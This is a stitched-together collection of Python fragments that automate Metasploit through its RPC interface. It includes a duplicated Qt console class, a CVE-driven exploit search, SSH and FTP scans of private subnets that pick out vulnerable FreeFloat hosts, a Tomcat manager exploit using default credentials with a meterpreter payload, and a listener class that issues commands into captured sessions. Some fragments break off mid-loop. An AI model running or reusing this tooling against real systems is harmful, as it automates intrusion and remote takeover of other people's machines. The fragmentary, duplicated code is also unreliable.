class MsfShellWindow(QMainWindow, Ui_MainWindow): def __init__(self, msfrpc, **kwargs): QMainWindow.__init__(self, kwargs.pop('parent', None)) self.setupUi(self) self.setWindowTitle('Metasploit Console') self._initCommandLine() self._msfInit(msfrpc, **kwargs) def _msfInit(self, msfrpc, **kwargs): self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'), self._getOutput) self.prompt = 'msf >' self.c = MsfRpcConsole(msfrpc, sessionid=kwargs.get('sessionid'), cb=self._emitSignal) if 'command' in kwargs: self.commanderLineEdit.setText(kwargs['command']) self.commanderLineEdit.emit(SIGNAL('returnPressed()')) def _emitSignal(self, d): self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d)) def _initCommandLine(self): self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'), self._sendCommand) self.vb = self.outputTextBrowser.verticalScrollBar() def _sendCommand(self): c = self.outputTextBrowser.textCursor() c.movePosition(QTextCursor.End) self.outputTextBrowser.setTextCursor(c) cmd = str(self.commanderLineEdit.text()) if cmd == 'exit': self.close() return self.c.execute(cmd) self.outputTextBrowser.insertHtml('%s<br>' % cmd) self.commanderLineEdit.clear() self.vb.setValue(self.vb.maximum()) def _getOutput(self, d): d = eval(str(d)) self.prompt = d['prompt'] self.outputTextBrowser.insertPlainText('\n%s\n' % d['data']) self.outputTextBrowser.insertHtml( '<font color="red"><b>%s</b></font><font color="black"> </font>' % self.prompt) self.vb.setValue(self.vb.maximum()) def closeEvent(self, event): self.c.__del__() QMainWindow.close(self)
class MsfShellWindow(QMainWindow, Ui_MainWindow): def __init__(self, msfrpc, **kwargs): QMainWindow.__init__(self, kwargs.pop('parent', None)) self.setupUi(self) self.setWindowTitle('Metasploit Console') self._initCommandLine() self._msfInit(msfrpc, **kwargs) def _msfInit(self, msfrpc, **kwargs): self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'), self._getOutput) self.prompt = 'msf >' self.c = MsfRpcConsole(msfrpc, sessionid=kwargs.get('sessionid'),cb=self._emitSignal) if 'command' in kwargs: self.commanderLineEdit.setText(kwargs['command']) self.commanderLineEdit.emit(SIGNAL('returnPressed()')) def _emitSignal(self, d): self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d)) def _initCommandLine(self): self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'), self._sendCommand) self.vb = self.outputTextBrowser.verticalScrollBar() def _sendCommand(self): c = self.outputTextBrowser.textCursor() c.movePosition(QTextCursor.End) self.outputTextBrowser.setTextCursor(c) cmd = str(self.commanderLineEdit.text()) if cmd == 'exit': self.close() return self.c.execute(cmd) self.outputTextBrowser.insertHtml('%s<br>' % cmd) self.commanderLineEdit.clear() self.vb.setValue(self.vb.maximum()) def _getOutput(self, d): d = eval(str(d)) self.prompt = d['prompt'] self.outputTextBrowser.insertPlainText('\n%s\n' % d['data']) self.outputTextBrowser.insertHtml('<font color="red"><b>%s</b></font><font color="black"> </font>' % self.prompt) self.vb.setValue(self.vb.maximum()) def closeEvent(self, event): self.c.__del__() QMainWindow.close(self)
client = MsfRpcClient("hocine") console = MsfRpcConsole(client, cb=console_reader) #utile.parcer_result_scannig("result_of_scannig.csv") list_cve = [] list_host_exploit = [] list_temp = list() hitgh_vul = open("high_vul.csv", "r") lines = csv.reader(hitgh_vul) for line in lines: list_cve = line[1].split(',') line[1] = "" for cve in list_cve: console.execute("search " + str(cve) + "") time.sleep(5) while status_of_console: time.sleep(2) list_temp.append(line[0]) list_temp.append(str(line_with_exploit).split()[2]) print list_temp line_with_exploit = [] list_host_exploit.append(list_temp) list_temp = [] print list_temp hitgh_vul.close() print list_host_exploit for target in list_host_exploit:
from metasploit.msfrpc import MsfRpcClient from metasploit.msfconsole import MsfRpcConsole client = MsfRpcClient('123456', user='******') print dir(console) auxilary = client.modules.auxiliary for i in auxilary: print "\t%s" % i scan = client.modules.use('auxiliary', 'scanner/ssh/ssh_version') scan.description scan.required scan['VERBOSE'] = True scan['RHOSTS'] = '192.168.1.119' print scan.execute() console = MsfRpcConsole(client) console.execute('use scanner/ssh/ssh_version') console.execute('set RHOSTS 192.168.1.119') console.execute('set VERBOSE True') console.execute('run')
exploits = client.modules.exploits for exploit in exploits: print("\t%s" % exploit) scan = client.modules.use('exploits', 'multi/http/tomcat_mgr_deploy') scan.description scan.required scan['RHOST'] = '192.168.100.2' scan['RPORT'] = '8180' scan['PATH'] = '/manager' scan['HttpUsername'] = '******' scan['HttpPassword'] = '******' scan['payload'] = 'java/meterpreter/bind_tcp' print(scan.execute()) console = MsfRpcConsole(client) console.execute('use exploit/multi/http/tomcat_mgr_deploy') console.execute('set RHOST 192.168.100.2') console.execute('set RPORT 8180') console.execute('set PATH /manager') console.execute('set HttpUsername tomcat') console.execute('set HttpPassword tomcat') console.execute('set payload java/meterpreter/bind_tcp') console.execute('run')
global global_console_status global_console_status = console_data['busy'] if '[+]' in console_data['data']: sigdata = console_data['data'].rstrip().split('\n') for line in sigdata: if '[+]' in line: global_positive_out.append(line) client = MsfRpcClient('password') # cb - callback function, executes when data arrives to console console = MsfRpcConsole(client, cb=read_console) time.sleep(10) console.execute('use auxiliary/scanner/ftp/ftp_version') console.execute('set RHOSTS 192.168.0.0/24') console.execute('set THREADS 20') console.execute('run') time.sleep(5) while global_console_status: print 'global_console_status: ' + str(global_console_status) time.sleep(5) time.sleep(5) targets = list() for line in global_positive_out: if 'FreeFloat' in line: ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}', line)[0] targets.append(ip)
class MetasploitInteractor(): def __init__(self, password, rpcport, listenerport, payload): self.interactorclient = MsfRpcClient(password, ssl=False, port=rpcport) self.consolebuffer = [] self.listenerconsole = MsfRpcConsole(self.interactorclient, cb=self.appendtoconsolebuffer) self.listenerconsole.execute('use exploit/multi/handler') self.listenerconsole.execute('set PAYLOAD ' + payload) self.listenerconsole.execute('set LPORT ' + str(listenerport)) self.listenerconsole.execute('set LHOST 0.0.0.0') self.listenerconsole.execute('set ExitOnSession false') self.listenerconsole.execute('exploit -j') self.currentsessionid = None self.currentshell = None def writetoconsole(self, data): self.listenerconsole.execute(data) def appendtoconsolebuffer(self, consoledata): self.consolebuffer.append(consoledata) def readconsole(self): unread = self.consolebuffer self.consolebuffer = [] return unread def getsessions(self, verbose=False): if verbose: return self.interactorclient.sessions.list.items() else: return [[sessionid, sessionmeta['info'], sessionmeta['username']] for sessionid, sessionmeta in self.interactorclient.sessions.list.items()] def sendcommandtosession(self, sessionid, command): if sessionid != self.currentsessionid: try: self.currentshell = self.interactorclient.sessions.session( sessionid) except KeyError: return "Error, session does not exist" self.currentsessionid = sessionid try: self.currentshell.write(command) resp = self.currentshell.read() except (metasploit.msfrpc.MsfRpcError, httplib.CannotSendRequest): return "Error, session died" return resp